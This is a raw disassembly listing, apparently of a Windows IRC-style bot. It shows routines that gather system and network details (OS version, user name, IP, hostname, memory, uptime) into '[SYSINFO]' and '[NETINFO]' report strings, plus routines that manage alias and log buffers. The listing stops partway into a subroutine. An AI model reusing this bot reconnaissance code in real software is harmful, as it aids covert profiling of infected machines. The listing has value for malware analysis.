loc_4088C7: ; CODE XREF: .text:0040889E�j
; .text:004088B3�j
push 1
pop eax
jmp short locret_4088CE
; ---------------------------------------------------------------------------
loc_4088CC: ; CODE XREF: .text:00408824�j
; .text:0040883B�j ...
xor eax, eax
locret_4088CE: ; CODE XREF: .text:004088CA�j
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4088D0 proc near ; CODE XREF: sub_409D82+98�p
; sub_40A776+71�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_0]
call dword_426460 ; inet_addr
mov [ebp+var_4], eax
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_40890B
push [ebp+arg_0]
call dword_4264A4 ; gethostbyname
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4088FE
or eax, 0FFFFFFFFh
jmp short locret_40890E
; ---------------------------------------------------------------------------
loc_4088FE: ; CODE XREF: sub_4088D0+27�j
mov eax, [ebp+var_8]
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
loc_40890B: ; CODE XREF: sub_4088D0+15�j
mov eax, [ebp+var_4]
locret_40890E: ; CODE XREF: sub_4088D0+2C�j
leave
retn
sub_4088D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408910 proc near ; CODE XREF: sub_40A776+129�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
cmp dword_426370, 0
jz short loc_40892A
call dword_426370 ; DnsFlushResolverCache
mov [ebp+var_4], eax
loc_40892A: ; CODE XREF: sub_408910+F�j
mov eax, [ebp+var_4]
leave
retn
sub_408910 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40892F proc near ; CODE XREF: sub_4011CD+38�p
; .text:004029F4�p ...
var_14 = dword ptr -14h
Dst = byte ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = byte ptr -0Ah
var_9 = byte ptr -9
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_14], 10h
push 10h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+Dst]
push eax
push [ebp+arg_0]
call dword_4263D4 ; getsockname
movzx eax, [ebp+var_9]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_B]
push eax
movzx eax, [ebp+var_C]
push eax
push offset aD_D_D_D_2 ; "%d.%d.%d.%d"
push offset Dest ; Dest
call _sprintf
add esp, 18h
mov eax, offset Dest
leave
retn
sub_40892F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40898A proc near ; CODE XREF: .text:004055C3�p
; sub_40634F+5E1�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
loc_408992: ; CODE XREF: sub_40898A+2C�j
cmp [ebp+arg_4], 1
jle short loc_4089B8
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_4]
dec eax
dec eax
mov [ebp+arg_4], eax
jmp short loc_408992
; ---------------------------------------------------------------------------
loc_4089B8: ; CODE XREF: sub_40898A+C�j
cmp [ebp+arg_4], 0
jz short loc_4089CC
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
loc_4089CC: ; CODE XREF: sub_40898A+32�j
mov eax, [ebp+var_4]
shr eax, 10h
mov ecx, [ebp+var_4]
and ecx, 0FFFFh
add eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shr eax, 10h
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
not eax
leave
retn
sub_40898A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
and dword ptr [ebp-4], 0
and word ptr [ebp-8], 0
mov eax, [ebp+8]
mov [ebp-0Ch], eax
mov eax, [ebp+0Ch]
mov [ebp-10h], eax
loc_408A10: ; CODE XREF: .text:00408A34�j
cmp dword ptr [ebp-10h], 1
jle short loc_408A36
mov eax, [ebp-0Ch]
movzx eax, word ptr [eax]
mov ecx, [ebp-4]
add ecx, eax
mov [ebp-4], ecx
mov eax, [ebp-0Ch]
inc eax
inc eax
mov [ebp-0Ch], eax
mov eax, [ebp-10h]
dec eax
dec eax
mov [ebp-10h], eax
jmp short loc_408A10
; ---------------------------------------------------------------------------
loc_408A36: ; CODE XREF: .text:00408A14�j
cmp dword ptr [ebp-10h], 1
jnz short loc_408A50
mov eax, [ebp-0Ch]
mov al, [eax]
mov [ebp-8], al
movzx eax, word ptr [ebp-8]
mov ecx, [ebp-4]
add ecx, eax
mov [ebp-4], ecx
loc_408A50: ; CODE XREF: .text:00408A3A�j
mov eax, [ebp-4]
sar eax, 10h
mov ecx, [ebp-4]
and ecx, 0FFFFh
add eax, ecx
mov [ebp-4], eax
mov eax, [ebp-4]
sar eax, 10h
mov ecx, [ebp-4]
add ecx, eax
mov [ebp-4], ecx
mov eax, [ebp-4]
not eax
mov [ebp-8], ax
mov ax, [ebp-8]
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408A81 proc near ; CODE XREF: sub_408C2B+25E�p
; sub_40ABFE+1C07�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
call ds:GetTickCount ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
sub eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_4]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_10], eax
push [ebp+var_10]
push [ebp+var_C]
push [ebp+var_8]
push offset aDdDhDm ; "%dd %dh %dm"
push 32h ; Count
push offset byte_42676C ; Dest
call __snprintf
add esp, 18h
mov eax, offset byte_42676C
leave
retn
sub_408A81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408B0C proc near ; CODE XREF: sub_408C2B+2AA�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 20h
loc_408B12: ; CODE XREF: sub_408B0C+3F�j
; sub_408B0C+4A�j
call sub_408FD4
mov [ebp+var_20], eax
mov [ebp+var_1C], edx
push 3E8h ; dwMilliseconds
call ds:Sleep ; Sleep
call sub_408FD4
sub eax, [ebp+var_20]
sbb edx, [ebp+var_1C]
push 0
push 0F4240h
push edx
push eax
call __aulldiv
mov [ebp+var_8], eax
mov [ebp+var_4], edx
cmp [ebp+var_4], 0
ja short loc_408B12
jb short loc_408B58
cmp [ebp+var_8], 0F4240h
ja short loc_408B12
loc_408B58: ; CODE XREF: sub_408B0C+41�j
push 0
push 64h
push [ebp+var_4]
push [ebp+var_8]
call __aullrem
mov [ebp+var_18], eax
mov [ebp+var_14], edx
mov [ebp+var_10], 64h
and [ebp+var_C], 0
cmp [ebp+var_14], 0
ja short loc_408B91
jb short loc_408B86
cmp [ebp+var_18], 50h
jnb short loc_408B91
loc_408B86: ; CODE XREF: sub_408B0C+72�j
mov [ebp+var_10], 4Bh
and [ebp+var_C], 0
loc_408B91: ; CODE XREF: sub_408B0C+70�j
; sub_408B0C+78�j
cmp [ebp+var_14], 0
ja short loc_408BAA
jb short loc_408B9F
cmp [ebp+var_18], 47h
jnb short loc_408BAA
loc_408B9F: ; CODE XREF: sub_408B0C+8B�j
mov [ebp+var_10], 42h
and [ebp+var_C], 0
loc_408BAA: ; CODE XREF: sub_408B0C+89�j
; sub_408B0C+91�j
cmp [ebp+var_14], 0
ja short loc_408BC3
jb short loc_408BB8
cmp [ebp+var_18], 37h
jnb short loc_408BC3
loc_408BB8: ; CODE XREF: sub_408B0C+A4�j
mov [ebp+var_10], 32h
and [ebp+var_C], 0
loc_408BC3: ; CODE XREF: sub_408B0C+A2�j
; sub_408B0C+AA�j
cmp [ebp+var_14], 0
ja short loc_408BDC
jb short loc_408BD1
cmp [ebp+var_18], 26h
jnb short loc_408BDC
loc_408BD1: ; CODE XREF: sub_408B0C+BD�j
mov [ebp+var_10], 21h
and [ebp+var_C], 0
loc_408BDC: ; CODE XREF: sub_408B0C+BB�j
; sub_408B0C+C3�j
cmp [ebp+var_14], 0
ja short loc_408BF5
jb short loc_408BEA
cmp [ebp+var_18], 1Eh
jnb short loc_408BF5
loc_408BEA: ; CODE XREF: sub_408B0C+D6�j
mov [ebp+var_10], 19h
and [ebp+var_C], 0
loc_408BF5: ; CODE XREF: sub_408B0C+D4�j
; sub_408B0C+DC�j
cmp [ebp+var_14], 0
ja short loc_408C0B
jb short loc_408C03
cmp [ebp+var_18], 0Ah
jnb short loc_408C0B
loc_408C03: ; CODE XREF: sub_408B0C+EF�j
and [ebp+var_10], 0
and [ebp+var_C], 0
loc_408C0B: ; CODE XREF: sub_408B0C+ED�j
; sub_408B0C+F5�j
mov eax, [ebp+var_8]
sub eax, [ebp+var_18]
mov ecx, [ebp+var_4]
sbb ecx, [ebp+var_14]
add eax, [ebp+var_10]
adc ecx, [ebp+var_C]
mov [ebp+var_8], eax
mov [ebp+var_4], ecx
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
leave
retn
sub_408B0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408C2B proc near ; CODE XREF: sub_40ABFE+21E2�p
VersionInformation= _OSVERSIONINFOA ptr -4E0h
var_44C = dword ptr -44Ch
Buffer = byte ptr -448h
var_344 = word ptr -344h
var_342 = byte ptr -342h
Dest = byte ptr -244h
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
DateStr = byte ptr -1B0h
Dst = byte ptr -168h
var_148 = dword ptr -148h
TimeStr = byte ptr -144h
var_FC = byte ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4E0h
push edi
mov [ebp+var_148], offset dword_4267A4
mov [ebp+VersionInformation.dwOSVersionInfoSize], 94h
lea eax, [ebp+VersionInformation]
push eax ; lpVersionInformation
call ds:GetVersionExA ; GetVersionExA
cmp [ebp+VersionInformation.dwMajorVersion], 4
jnz short loc_408C93
cmp [ebp+VersionInformation.dwMinorVersion], 0
jnz short loc_408C93
cmp [ebp+VersionInformation.dwPlatformId], 1
jnz short loc_408C7B
mov [ebp+var_148], offset a95 ; "95"
loc_408C7B: ; CODE XREF: sub_408C2B+44�j
cmp [ebp+VersionInformation.dwPlatformId], 2
jnz short loc_408C8E
mov [ebp+var_148], offset aNt ; "NT"
loc_408C8E: ; CODE XREF: sub_408C2B+57�j
jmp loc_408D36
; ---------------------------------------------------------------------------
loc_408C93: ; CODE XREF: sub_408C2B+32�j
; sub_408C2B+3B�j
cmp [ebp+VersionInformation.dwMajorVersion], 4
jnz short loc_408CB4
cmp [ebp+VersionInformation.dwMinorVersion], 0Ah
jnz short loc_408CB4
mov [ebp+var_148], offset a98 ; "98"
jmp loc_408D36
; ---------------------------------------------------------------------------
loc_408CB4: ; CODE XREF: sub_408C2B+6F�j
; sub_408C2B+78�j
cmp [ebp+VersionInformation.dwMajorVersion], 4
jnz short loc_408CD2
cmp [ebp+VersionInformation.dwMinorVersion], 5Ah
jnz short loc_408CD2
mov [ebp+var_148], offset aMe ; "ME"
jmp short loc_408D36
; ---------------------------------------------------------------------------
loc_408CD2: ; CODE XREF: sub_408C2B+90�j
; sub_408C2B+99�j
cmp [ebp+VersionInformation.dwMajorVersion], 5
jnz short loc_408CF0
cmp [ebp+VersionInformation.dwMinorVersion], 0
jnz short loc_408CF0
mov [ebp+var_148], offset a2k ; "2K"
jmp short loc_408D36
; ---------------------------------------------------------------------------
loc_408CF0: ; CODE XREF: sub_408C2B+AE�j
; sub_408C2B+B7�j
cmp [ebp+VersionInformation.dwMajorVersion], 5
jnz short loc_408D0E
cmp [ebp+VersionInformation.dwMinorVersion], 1
jnz short loc_408D0E
mov [ebp+var_148], offset aXp ; "XP"
jmp short loc_408D36
; ---------------------------------------------------------------------------
loc_408D0E: ; CODE XREF: sub_408C2B+CC�j
; sub_408C2B+D5�j
cmp [ebp+VersionInformation.dwMajorVersion], 5
jnz short loc_408D2C
cmp [ebp+VersionInformation.dwMinorVersion], 2
jnz short loc_408D2C
mov [ebp+var_148], offset a2003 ; "2003"
jmp short loc_408D36
; ---------------------------------------------------------------------------
loc_408D2C: ; CODE XREF: sub_408C2B+EA�j
; sub_408C2B+F3�j
mov [ebp+var_148], offset a??? ; "???"
loc_408D36: ; CODE XREF: sub_408C2B:loc_408C8E�j
; sub_408C2B+84�j ...
cmp [ebp+VersionInformation.dwPlatformId], 2
jnz short loc_408D77
movsx eax, [ebp+VersionInformation.szCSDVersion]
test eax, eax
jz short loc_408D77
lea eax, [ebp+VersionInformation.szCSDVersion]
push eax
push [ebp+var_148]
push offset aSS_6 ; "%s (%s)"
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+Dest]
mov [ebp+var_148], eax
loc_408D77: ; CODE XREF: sub_408C2B+112�j
; sub_408C2B+11D�j
mov [ebp+var_1B8], 100h
mov ax, word_4216EC
mov [ebp+var_344], ax
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_342]
rep stosd
stosw
cmp dword_426344, 0
jz short loc_408DBA
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_344]
push eax
call dword_426344 ; GetUserNameA
loc_408DBA: ; CODE XREF: sub_408C2B+179�j
push [ebp+arg_4]
call sub_40892F
pop ecx
push eax
call dword_426460 ; inet_addr
mov [ebp+var_44C], eax
push 2
push 4
lea eax, [ebp+var_44C]
push eax
call dword_4263E8 ; gethostbyaddr
mov [ebp+var_1B4], eax
cmp [ebp+var_1B4], 0
jz short loc_408E08
mov eax, [ebp+var_1B4]
push dword ptr [eax] ; Format
lea eax, [ebp+var_FC]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_408E1B
; ---------------------------------------------------------------------------
loc_408E08: ; CODE XREF: sub_408C2B+1C3�j
push offset aCouldnTResolve ; "couldn't resolve host"
lea eax, [ebp+var_FC]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_408E1B: ; CODE XREF: sub_408C2B+1DB�j
push 104h ; uSize
lea eax, [ebp+Buffer]
push eax ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
push 46h ; cchDate
lea eax, [ebp+DateStr]
push eax ; lpDateStr
push offset Format ; "dd:MMM:yyyy"
push 0 ; lpDate
push 0 ; dwFlags
push 409h ; Locale
call ds:GetDateFormatA ; GetDateFormatA
push 46h ; cchTime
lea eax, [ebp+TimeStr]
push eax ; lpTimeStr
push offset aHhMmSs ; "HH:mm:ss"
push 0 ; lpTime
push 0 ; dwFlags
push 409h ; Locale
call ds:GetTimeFormatA ; GetTimeFormatA
push 20h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push eax ; lpBuffer
call ds:GlobalMemoryStatus ; GlobalMemoryStatus
push 0
call sub_408A81
pop ecx
push eax
lea eax, [ebp+TimeStr]
push eax
lea eax, [ebp+DateStr]
push eax
lea eax, [ebp+var_344]
push eax
push [ebp+arg_4]
call sub_40892F
pop ecx
push eax
lea eax, [ebp+var_FC]
push eax
lea eax, [ebp+Buffer]
push eax
push [ebp+VersionInformation.dwBuildNumber]
push [ebp+VersionInformation.dwMinorVersion]
push [ebp+VersionInformation.dwMajorVersion]
push [ebp+var_148]
call sub_408B0C
push edx
push eax
push offset aSysinfoCpuI64u ; "[SYSINFO]: [CPU]: %I64uMHz. [OS]: Windo"...
push 200h ; Count
push [ebp+arg_0] ; Dest
call __snprintf
add esp, 40h
mov eax, [ebp+arg_0]
pop edi
leave
retn
sub_408C2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408EF7 proc near ; CODE XREF: sub_40ABFE+2169�p
; sub_40ABFE+36A3�p
var_8C = dword ptr -8Ch
Dest = byte ptr -88h
Dst = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8Ch
push 80h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
cmp dword_426504, 0
jnz short loc_408F7F
push 0
push 80h
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_8C]
push eax
call dword_426330 ; InternetGetConnectedStateExA
test eax, eax
jnz short loc_408F48
push offset aNotConnected ; "Not connected"
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_408F48: ; CODE XREF: sub_408EF7+3F�j
mov eax, [ebp+var_8C]
and eax, 1
test eax, eax
jz short loc_408F6A
push offset aDialUp ; "Dial-up"
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_408F7D
; ---------------------------------------------------------------------------
loc_408F6A: ; CODE XREF: sub_408EF7+5C�j
push offset aLan ; "LAN"
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_408F7D: ; CODE XREF: sub_408EF7+71�j
jmp short loc_408FA2
; ---------------------------------------------------------------------------
loc_408F7F: ; CODE XREF: sub_408EF7+23�j
push offset off_4217DC ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push offset off_4217E0 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_408FA2: ; CODE XREF: sub_408EF7:loc_408F7D�j
push [ebp+arg_4]
push [ebp+arg_8]
call sub_40892F
pop ecx
push eax
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+Dest]
push eax
push offset aNetinfoTypeSS_ ; "[NETINFO]: [Type]: %s (%s). [IP Address"...
push 200h ; Count
push [ebp+arg_0] ; Dest
call __snprintf
add esp, 1Ch
mov eax, [ebp+arg_0]
leave
retn
sub_408EF7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408FD4 proc near ; CODE XREF: sub_408B0C:loc_408B12�p
; sub_408B0C+1C�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
rdtsc
pop edi
pop esi
pop ebx
pop ebp
retn
sub_408FD4 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
and dword ptr [ebp-4], 0
jmp short loc_408FF2
; ---------------------------------------------------------------------------
loc_408FEB: ; CODE XREF: .text:loc_409093�j
mov eax, [ebp-4]
inc eax
mov [ebp-4], eax
loc_408FF2: ; CODE XREF: .text:00408FE9�j
cmp dword ptr [ebp-4], 10h
jge loc_409098
mov eax, [ebp-4]
imul eax, 0B8h
movsx eax, byte_42A7C0[eax]
test eax, eax
jz short loc_40902D
push dword ptr [ebp+8]
mov eax, [ebp-4]
imul eax, 0B8h
add eax, offset byte_42A7C0
push eax
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_409093
loc_40902D: ; CODE XREF: .text:0040900E�j
push 0B8h
push 0
mov eax, [ebp-4]
imul eax, 0B8h
add eax, offset byte_42A7C0
push eax
call _memset
add esp, 0Ch
push 17h
push dword ptr [ebp+8]
mov eax, [ebp-4]
imul eax, 0B8h
add eax, offset byte_42A7C0
push eax
call _strncpy
add esp, 0Ch
push 9Fh
push dword ptr [ebp+0Ch]
mov eax, [ebp-4]
imul eax, 0B8h
add eax, offset dword_42A7D8
push eax
call _strncpy
add esp, 0Ch
mov eax, dword_421DF0
inc eax
mov dword_421DF0, eax
jmp short loc_409098
; ---------------------------------------------------------------------------
loc_409093: ; CODE XREF: .text:0040902B�j
jmp loc_408FEB
; ---------------------------------------------------------------------------
loc_409098: ; CODE XREF: .text:00408FF6�j
; .text:00409091�j
mov eax, [ebp-4]
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40909D proc near ; CODE XREF: sub_40ABFE+1F23�p
Dest = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 204h
push 0
push [ebp+arg_8]
push offset aAliasList ; "-[Alias List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40A08D
add esp, 14h
and [ebp+var_4], 0
jmp short loc_4090CB
; ---------------------------------------------------------------------------
loc_4090C4: ; CODE XREF: sub_40909D:loc_409139�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4090CB: ; CODE XREF: sub_40909D+25�j
cmp [ebp+var_4], 10h
jge short locret_40913B
mov eax, [ebp+var_4]
imul eax, 0B8h
movsx eax, byte_42A7C0[eax]
test eax, eax
jz short loc_409139
mov eax, [ebp+var_4]
imul eax, 0B8h
add eax, offset dword_42A7D8
push eax
mov eax, [ebp+var_4]
imul eax, 0B8h
add eax, offset byte_42A7C0
push eax
push [ebp+var_4]
push offset aD_SS ; "%d. %s = %s"
push 200h ; Count
lea eax, [ebp+Dest]
push eax ; Dest
call __snprintf
add esp, 18h
push 1
push [ebp+arg_8]
lea eax, [ebp+Dest]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40A08D
add esp, 14h
loc_409139: ; CODE XREF: sub_40909D+46�j
jmp short loc_4090C4
; ---------------------------------------------------------------------------
locret_40913B: ; CODE XREF: sub_40909D+32�j
leave
retn
sub_40909D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40913D proc near ; CODE XREF: .text:00402C32�p
; .text:00403A43�p ...
var_14 = dword ptr -14h
SystemTime = _SYSTEMTIME ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+SystemTime]
push eax ; lpSystemTime
call ds:GetLocalTime ; GetLocalTime
mov [ebp+var_14], 80h
jmp short loc_40915D
; ---------------------------------------------------------------------------
loc_409156: ; CODE XREF: sub_40913D:loc_409197�j
mov eax, [ebp+var_14]
dec eax
mov [ebp+var_14], eax
loc_40915D: ; CODE XREF: sub_40913D+17�j
cmp [ebp+var_14], 0
jl short loc_409199
mov eax, [ebp+var_14]
shl eax, 7
movsx eax, byte_4267A8[eax]
test eax, eax
jz short loc_409197
push 7Fh ; Count
mov eax, [ebp+var_14]
shl eax, 7
add eax, offset byte_4267A8
push eax ; Source
mov eax, [ebp+var_14]
inc eax
shl eax, 7
add eax, offset byte_4267A8
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_409197: ; CODE XREF: sub_40913D+35�j
jmp short loc_409156
; ---------------------------------------------------------------------------
loc_409199: ; CODE XREF: sub_40913D+24�j
push [ebp+arg_0]
movzx eax, [ebp+SystemTime.wSecond]
push eax
movzx eax, [ebp+SystemTime.wMinute]
push eax
movzx eax, [ebp+SystemTime.wHour]
push eax
movzx eax, [ebp+SystemTime.wYear]
push eax
movzx eax, [ebp+SystemTime.wDay]
push eax
movzx eax, [ebp+SystemTime.wMonth]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push 80h ; Count
push offset byte_4267A8 ; Dest
call __snprintf
add esp, 28h
leave
retn
sub_40913D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4091D3(char *Format, char)
sub_4091D3 proc near ; CODE XREF: sub_40A776+14A�p
; sub_40ABFE+8FC�p ...
Args = dword ptr -84h
Dest = byte ptr -80h
Format = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 84h
lea eax, [ebp+arg_4]
mov [ebp+Args], eax
push [ebp+Args] ; Args
push [ebp+Format] ; Format
push 80h ; Count
lea eax, [ebp+Dest]
push eax ; Dest
call __vsnprintf
add esp, 10h
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
leave
retn
sub_4091D3 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
mov dword ptr [ebp-4], 80h
and dword ptr [ebp-8], 0
cmp dword ptr [ebp+14h], 0
jnz short loc_40923A
push 0
push dword ptr [ebp+10h]
push offset aLogs ; "-[Logs]-"
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40A08D
add esp, 14h
loc_40923A: ; CODE XREF: .text:00409220�j
cmp dword ptr [ebp+18h], 0
jz short loc_409258
push dword ptr [ebp+18h]
call _atoi
pop ecx
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jz short loc_409258
mov eax, [ebp-8]
mov [ebp-4], eax
loc_409258: ; CODE XREF: .text:0040923E�j
; .text:00409250�j
and dword ptr [ebp-0Ch], 0
and dword ptr [ebp-10h], 0
jmp short loc_409270
; ---------------------------------------------------------------------------
loc_409262: ; CODE XREF: .text:loc_4092FC�j
mov eax, [ebp-0Ch]
inc eax
mov [ebp-0Ch], eax
mov eax, [ebp-10h]
inc eax
mov [ebp-10h], eax
loc_409270: ; CODE XREF: .text:00409260�j
cmp dword ptr [ebp-0Ch], 80h
jge locret_409301
mov eax, [ebp-10h]
cmp eax, [ebp-4]
jge short locret_409301
mov eax, [ebp-0Ch]
shl eax, 7
movsx eax, byte_4267A8[eax]
test eax, eax
jz short loc_4092FC
cmp dword ptr [ebp+18h], 0
jz short loc_4092A2
cmp dword ptr [ebp-8], 0
jz short loc_4092C3
loc_4092A2: ; CODE XREF: .text:0040929A�j
push 1
push dword ptr [ebp+10h]
mov eax, [ebp-0Ch]
shl eax, 7
add eax, offset byte_4267A8
push eax
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40A08D
add esp, 14h
jmp short loc_4092FC
; ---------------------------------------------------------------------------
loc_4092C3: ; CODE XREF: .text:004092A0�j
push dword ptr [ebp+18h]
mov eax, [ebp-0Ch]
shl eax, 7
add eax, offset byte_4267A8
push eax
call sub_408200
pop ecx
pop ecx
test eax, eax
jz short loc_4092FC
push 1
push dword ptr [ebp+10h]
mov eax, [ebp-0Ch]
shl eax, 7
add eax, offset byte_4267A8
push eax
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40A08D
add esp, 14h
loc_4092FC: ; CODE XREF: .text:00409294�j
; .text:004092C1�j ...
jmp loc_409262
; ---------------------------------------------------------------------------
locret_409301: ; CODE XREF: .text:00409277�j
; .text:00409283�j
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409303 proc near ; CODE XREF: sub_40ABFE+210A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_409321
; ---------------------------------------------------------------------------
loc_40930D: ; CODE XREF: sub_409303+27�j
mov eax, [ebp+var_4]
shl eax, 7
and byte_4267A8[eax], 0
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_409321: ; CODE XREF: sub_409303+8�j
cmp [ebp+var_4], 80h
jge short loc_40932C
jmp short loc_40930D
; ---------------------------------------------------------------------------
loc_40932C: ; CODE XREF: sub_409303+25�j
cmp [ebp+arg_C], 0
jnz short loc_40934A
push 0
push [ebp+arg_8]
push offset dword_421870
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40A08D
add esp, 14h
loc_40934A: ; CODE XREF: sub_409303+2D�j
push offset dword_421898
call sub_40913D
pop ecx
leave
retn
sub_409303 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
and dword ptr [ebp-4], 0
jmp short loc_409368
; ---------------------------------------------------------------------------
loc_409361: ; CODE XREF: .text:loc_4093A1�j
mov eax, [ebp-4]
inc eax
mov [ebp-4], eax
loc_409368: ; CODE XREF: .text:0040935F�j
cmp dword ptr [ebp-4], 80h
jge short loc_4093A3
mov eax, [ebp-4]
shl eax, 7
movsx eax, byte_4267A8[eax]
test eax, eax
jz short loc_4093A1
push dword ptr [ebp+8]
mov eax, [ebp-4]
shl eax, 7
add eax, offset byte_4267A8
push eax
call sub_408200
pop ecx
pop ecx
test eax, eax
jz short loc_4093A1
push 1
pop eax
jmp short locret_4093A5
; ---------------------------------------------------------------------------
loc_4093A1: ; CODE XREF: .text:00409380�j
; .text:0040939A�j
jmp short loc_409361
; ---------------------------------------------------------------------------
loc_4093A3: ; CODE XREF: .text:0040936F�j
xor eax, eax
locret_4093A5: ; CODE XREF: .text:0040939F�j
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_4093A7(LPVOID)
sub_4093A7 proc near ; DATA XREF: sub_40ABFE+2058�o
Dest = byte ptr -328h
var_128 = dword ptr -128h
